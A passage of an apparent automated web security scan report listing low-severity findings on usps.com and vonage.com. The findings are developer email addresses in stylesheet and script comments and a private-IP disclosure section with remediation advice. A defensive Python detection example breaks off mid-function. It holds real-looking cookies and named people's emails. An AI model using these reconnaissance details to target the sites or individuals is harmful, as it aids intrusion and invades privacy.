       @author            aziz.syed@akqa.com
       @description    Style definitions for the homepage

changes:
       
       Contents
       1. Carousel
       2. Promo spots
       3. Background
       4. Quick Tools
       5. Print a Label Widget
       6. Misc
...[SNIP]...

18.36. https://www.usps.com/ContentTemplates/assets/css/templates.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/assets/css/templates.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/assets/css/templates.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "8626a49c-1-0-178d"
Last-Modified: Mon, 07 Feb 2011 14:36:35 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 6029
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:15 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        templates.css
       @author            david.milton@akqa.com
       @description    Page layout + global style definitions for the content page templates
       
       Contents
       1. Page Layout
       2. Generic Styles
       3. Navigation Pane (navigation side bar)
       4. Component
...[SNIP]...

18.37. https://www.usps.com/ContentTemplates/common/css/fonts.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/fonts.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/fonts.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "6c32b0cd-3-0-ac2"
Last-Modified: Tue, 09 Nov 2010 17:06:35 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2754
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:16 GMT
Connection: keep-alive

/*    -----------------------------------------------------------------------------------
       @filename        fonts.jsp (content type = "text/css")
       @author            aziz.syed@akqa.com
       @description    Style definitions for the global type styles &amp; colors
   ----------------------------------------------------------------------------------- */
.fontStyle1,
h1{
   font-size:3.0em;
...[SNIP]...

18.38. https://www.usps.com/ContentTemplates/common/css/globals/button-styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/button-styles.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/button-styles.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "b8ddc8e3-1-0-2833"
Last-Modified: Wed, 25 May 2011 11:13:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 10291
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:17 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        button-styles.css
       @author            aziz.syed@akqa.com
       @description    buttonss global style definitions
       
       Content
       1. Buttons
/*
   =========== 1 Buttons ===========
*/
/*
* Large text box
*/
div.input-text-lg span {
   height:27px;
}
div.
...[SNIP]...

18.39. https://www.usps.com/ContentTemplates/common/css/globals/links.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/links.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/links.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "90b8f797-1-0-6a5"
Last-Modified: Tue, 09 Nov 2010 17:07:52 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1701
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:17 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        links.css
       @author            aziz.syed@akqa.com
       @description    links global style definitions
       
       Content
       1. Links
/*
   =========== 1 Links ===========
*/
a{
   color:#2f6fa9;
   text-decoration:underline;
}

a.primary,
a.standard,
a.t
...[SNIP]...

18.40. https://www.usps.com/ContentTemplates/common/css/globals/modals.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/modals.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/modals.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "1ee39bf6-1-0-14ce"
Last-Modified: Tue, 09 Nov 2010 17:07:52 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5326
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:18 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        modals.css
       @author            aziz.syed@akqa.com
       @description    global modals style definitions
       
       Content
       1. Modals
       2. Product Added Modals
/*
   =========== 8. Modal ===========
*/

div.force-modal-close{
   display:none;
}
#modals{
...[SNIP]...

18.41. https://www.usps.com/ContentTemplates/common/css/globals/qt-modals.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/qt-modals.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/qt-modals.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "d9a7b5e8-2-0-3edb"
Last-Modified: Tue, 23 Aug 2011 14:36:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 16091
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:18 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        qt-modals.css
       @author            aziz.syed@akqa.com
       @description    quick tools modals style definitions
       
       Content
       1. Quick Tools Modals
       2. PO Locator Modal
       3. Caclulate Price Modal
/*
   =========== 1. Quick Tools Modals ===========
*/
...[SNIP]...

18.42. https://www.usps.com/ContentTemplates/common/css/globals/text-fields.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/text-fields.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/text-fields.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "235e925f-1-0-71a"
Last-Modified: Tue, 09 Nov 2010 17:07:53 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1818
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:17 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        text-fields.css
       @author            aziz.syed@akqa.com
       @description    text fields global style definitions
       
       Content
       1. Text fields
/*    
   =========== 1. Text fields ===========
*/
/*
* Styled text fields. Container must have the class "input
...[SNIP]...

18.43. https://www.usps.com/ContentTemplates/common/css/globals/tooltips.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/tooltips.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/tooltips.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "e5e754b4-1-0-831"
Last-Modified: Tue, 09 Nov 2010 17:07:53 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2097
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:18 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        tooltips.css
       @author            aziz.syed@akqa.com
       @description    global tooltips style definitions
       
       Content
       1. Tool Tips
/*
   =========== 1. Tool Tips ===========
*/

.toolIcon{
   background:transparent url(/ContentTemplates/common/imag
...[SNIP]...

18.44. https://www.usps.com/ContentTemplates/common/css/globals/widgets/modal-fluid/modal-fluid.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/globals/widgets/modal-fluid/modal-fluid.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/globals/widgets/modal-fluid/modal-fluid.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "38c46ae7-1-0-24a1"
Last-Modified: Tue, 09 Nov 2010 17:09:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9377
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:14 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        modal_fluid.css
       @author            trey.eckels@akqa.com
       @description    Style definitions for the verticaly fluid modal
       
       Contents
       1. Lightbox Background
       2. Modal Outlines
       3. Close Modal Button
       4. Modal Endcaps and borders
       5. Common Ele
...[SNIP]...

18.45. https://www.usps.com/ContentTemplates/common/css/usps-print.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/usps-print.css

Issue detail

The following email address was disclosed in the response:

Request

GET /ContentTemplates/common/css/usps-print.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uspsstaticwebpop=1; WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315327999740:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "98468ee8-1-0-d95"
Last-Modified: Tue, 09 Nov 2010 17:06:36 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 3477
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:34 GMT
Connection: keep-alive

/*    ---------------------------------------------------------------
       @filename        usps_print.css
       @author        aziz.syed@akqa.com
       @description    Global style definitions to be used when printing
       
       Contents
       1. HIDDEN ELEMENTS
   --------------------------------------------------------------- */
   
/*    
   =========== 1. HI
...[SNIP]...

18.46. https://www.usps.com/ContentTemplates/common/css/usps.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/css/usps.css

Issue detail

The following email address was disclosed in the response:

aziz.syed@akqa.com (the @author line of the stylesheet's header comment)

Request

GET /ContentTemplates/common/css/usps.css HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331592893:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/css
ETag: "3a48bf6e-3-0-b483"
Last-Modified: Wed, 31 Aug 2011 14:32:13 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 46211
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:14 GMT
Connection: keep-alive

   /*    ---------------------------------------------------------------
       @filename        usps.css
       @author            aziz.syed@akqa.com
       @description    Page layout + global style definitions
       
       Contents
       1. Page Layout
       2. Generic Styles
       3. Header
       4. Footer
       5. Navigation
       6. Miscellaneous
       7. Quick Tools
       8. Lef
...[SNIP]...

18.47. https://www.usps.com/ContentTemplates/common/scripts/usps/modules/usps/widget/carousel.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/scripts/usps/modules/usps/widget/carousel.js

Issue detail

The following email address was disclosed in the response:

aziz.syed@akqa.com (the @author tag of the file-overview comment)

Request

GET /ContentTemplates/common/scripts/usps/modules/usps/widget/carousel.js HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uspsstaticwebpop=1; WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315327999740:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: application/x-javascript
ETag: "5bfda3-1017-0-10cb"
Last-Modified: Tue, 22 Feb 2011 18:28:11 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4299
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:20 GMT
Connection: keep-alive

/**
*
* @fileoverview
* @author <a href="mailto:aziz.syed@akqa.com">Aziz Syed</a>
*/

dojo.provide("usps.widget.carousel");

/**
* @name USPS.widget.carousel
* @namespace
*/
dojo.d
...[SNIP]...

18.48. https://www.usps.com/ContentTemplates/common/scripts/usps/modules/usps/widget/homecarousel.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usps.com
Path:   /ContentTemplates/common/scripts/usps/modules/usps/widget/homecarousel.js

Issue detail

The following email address was disclosed in the response:

aziz.syed@akqa.com (the @author tag of the file-overview comment)

Request

GET /ContentTemplates/common/scripts/usps/modules/usps/widget/homecarousel.js HTTP/1.1
Host: www.usps.com
Connection: keep-alive
Referer: https://www.usps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uspsstaticwebpop=1; WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315327999740:ss=1315331559860

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: application/x-javascript
ETag: "e9bd10c-109-0-257a"
Last-Modified: Mon, 22 Aug 2011 14:42:49 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9594
Cache-Control: no-cache, must-revalidate
Date: Tue, 06 Sep 2011 12:53:19 GMT
Connection: keep-alive

/**
*
* @fileoverview
* @author <a href="mailto:aziz.syed@akqa.com">Aziz Syed</a>
*/

dojo.provide("usps.widget.homecarousel");
dojo.require("usps.widget.carousel");
/**
* @name USPS.wi
...[SNIP]...

18.49. http://www.vonage.com/googlesearch/cluster.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /googlesearch/cluster.js

Issue detail

The following email addresses were disclosed in the response:

dspencer@google.com and bdanbury@vonage.com (attribution comments at the top of the file and the @author tag)

Request

GET /googlesearch/cluster.js HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:59 GMT
Server: Apache
Last-Modified: Thu, 25 Sep 2008 20:21:35 GMT
ETag: "a54bb2-14b2-457be25b711c0"
Accept-Ranges: bytes
Content-Length: 5298
Content-Type: application/javascript

// Copyright 2006 Google Inc., All Rights Reserved
// dspencer@google.com

// Modified to support XML response from GSA
// 2008-03-27
// bdanbury@vonage.com

/**
* @fileoverview
*
* This file is for the rendering of Clustered Search results
* on the GSA.
*
*
* The flow is:
*
* - User initiates search query and wants clustered results
*
* - Resp
...[SNIP]...
calls
* GWS and so on, and then the results come back as XML
*
* - Then the XML is rendered in renderXML().
*
* The XML that comes back from the GSA has this general structure:
*
*
* @author dspencer@google.com
*
* @requires common.js
* @requires xmlthtp.js
* @requires uri.js
*/


var CS_CLUSTER_CONTAINER = 'clustering';

/* Prefix of cluster label element id. This is followed by a number, probably 0..9
...[SNIP]...

18.50. http://www.vonage.com/googlesearch/common.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /googlesearch/common.js

Issue detail

The following email address was disclosed in the response:

jlim@google.com (used as an example value in a code comment)

Request

GET /googlesearch/common.js HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:59 GMT
Server: Apache
Last-Modified: Wed, 11 Jun 2008 17:10:00 GMT
ETag: "204bb3-db19-44f671d618a00"
Accept-Ranges: bytes
Content-Length: 56089
Content-Type: application/javascript

// copied from google3/java/com/google/caribou/antlers/fin/jsdata

//------------------------------------------------------------------------
// This file contains common utilities and basic javascrip
...[SNIP]...
ss = token.substring(1, (end != -1) ? end : token.length);
} else if (address == "") {
name += token;
}
i += token.length;
}

// Check if it's a simple email address of the form "jlim@google.com"
if (address == "" && name.indexOf("@") != -1) {
address = name;
name = "";
}

name = CollapseWhitespace(name);
name = StripQuotes(name, "'");
name = StripQuotes(name, "\"");
addre
...[SNIP]...

18.51. http://www.vonage.com/googlesearch/uri.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /googlesearch/uri.js

Issue detail

The following email address was disclosed in the response:

msamuel@google.com (the @author tag of the file-overview comment)

Request

GET /googlesearch/uri.js HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage.com/search.php?q=xss&submit.x=18&submit.y=13&submit=Search&gsaCtx=i&lang_cntry=en_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP_GEOINFO="{country:'us',region:'',city:'',zipCode:'',areaCode:'',metroCode:''}"; s_cc=true; s_cpmcvp=%5B%5B%27Google-Organic-telephone%2520service%27%2C%271315327933547%27%5D%5D; __utma=224263452.956306206.1315327934.1315327934.1315327934.1; __utmb=224263452.1.10.1315327934; __utmc=224263452; __utmz=224263452.1315327934.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_vi=[CS]v1|273304B6850795C1-60000100600024FD[CE]; vpc=1; oa_event=1; s_nr=1315328337788-New; gpv_pageName=index; s_cm=telephone%20serviceGooglewww.google.com; s_sq=vonagevonagecomsubscribeprod%3D%2526pid%253Dindex%2526pidt%253D1%2526oid%253Dhttp%25253A//www.vonage.com/images/common/btn_search.gif%2526ot%253DIMAGE; op471customerhomepagegum=a04v0e90o72796q0724o91744; op471customerhomepageliid=a04v0e90o72796q0724o91744

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:58:59 GMT
Server: Apache
Last-Modified: Wed, 11 Jun 2008 17:10:00 GMT
ETag: "420bb5-4497-44f671d618a00"
Accept-Ranges: bytes
Content-Length: 17559
Content-Type: application/javascript

// Copyright 2006 Google Inc.
// All Rights Reserved.

/**
* @fileoverview
* Implements RFC 3986 for parsing/formatting URIs.
*
* @author msamuel@google.com
*/

/**
* creates a uri from the string form. The parser is relaxed, so special
* characters that aren't escaped but don't cause ambiguities will not cause
* parse failures.
*
* @return {URI|Nu
...[SNIP]...

19. Private IP addresses disclosed
There are 79 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
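The check behind this finding, and the masking the remediation paragraph recommends, are small enough to show in full. The Python below is an added example written for this page; it is not part of the report or of the scanner that produced it. It matches exactly the three RFC 1918 blocks (rather than the broader "private" notion some libraries use), looks for addresses in both response headers and body, and copes with an address fused into an alphanumeric cookie value, which a word-boundary regex would miss. The sample responses are constructed to mirror the header, cookie and HTML shapes seen in the items below; the masking secret and the "node-" tag prefix are assumptions.

```python
"""Detect and mask RFC 1918 addresses in raw HTTP responses.

Added example; not part of the original report or of the scanner that
produced it. The sample responses are constructed to mirror the shapes
seen in the findings: an X-FB-Server header, a persistence cookie with
an address glued into an alphanumeric value, and links in an HTML body.
"""
import hashlib
import ipaddress
import re

# Exactly the three RFC 1918 blocks. ipaddress's is_private is wider
# (loopback, link-local, 100.64/10 ...) and would over-report.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Dotted-quad candidates. Digit lookarounds rather than \b, so that an
# address fused to letters ("RNLPJJS10.160.118.20T0x...") is still found
# while longer dotted runs of digits are not split into false matches.
_IPV4_CANDIDATE = re.compile(r"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)")


def is_rfc1918(text):
    """True if text is a syntactically valid IPv4 address inside RFC 1918 space."""
    try:
        addr = ipaddress.IPv4Address(text)
    except ValueError:  # e.g. 999.1.1.1 looks like a quad but is not an address
        return False
    return any(addr in net for net in RFC1918)


def find_private_ips(text):
    """Distinct RFC 1918 addresses in text, in order of first appearance."""
    found = []
    for m in _IPV4_CANDIDATE.finditer(text):
        ip = m.group()
        if is_rfc1918(ip) and ip not in found:
            found.append(ip)
    return found


def scan_response(raw):
    """Map each disclosed address to where it appears: 'header <Name>' or 'body'."""
    head, _, body = raw.partition("\r\n\r\n")
    hits = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        for ip in find_private_ips(value):
            hits.setdefault(ip, []).append("header " + name.strip())
    for ip in find_private_ips(body):
        hits.setdefault(ip, []).append("body")
    return hits


def mask_private_ips(text, secret=b"rotate-me-in-production"):
    """Rewrite RFC 1918 addresses as stable opaque node tags, the remediation
    the report suggests for load-balancer tracking. A keyed hash keeps the
    mapping consistent across responses without letting a client recover
    the address. The secret and the 'node-' prefix are assumptions."""
    def repl(m):
        ip = m.group()
        if not is_rfc1918(ip):
            return ip
        tag = hashlib.blake2b(ip.encode(), key=secret, digest_size=4).hexdigest()
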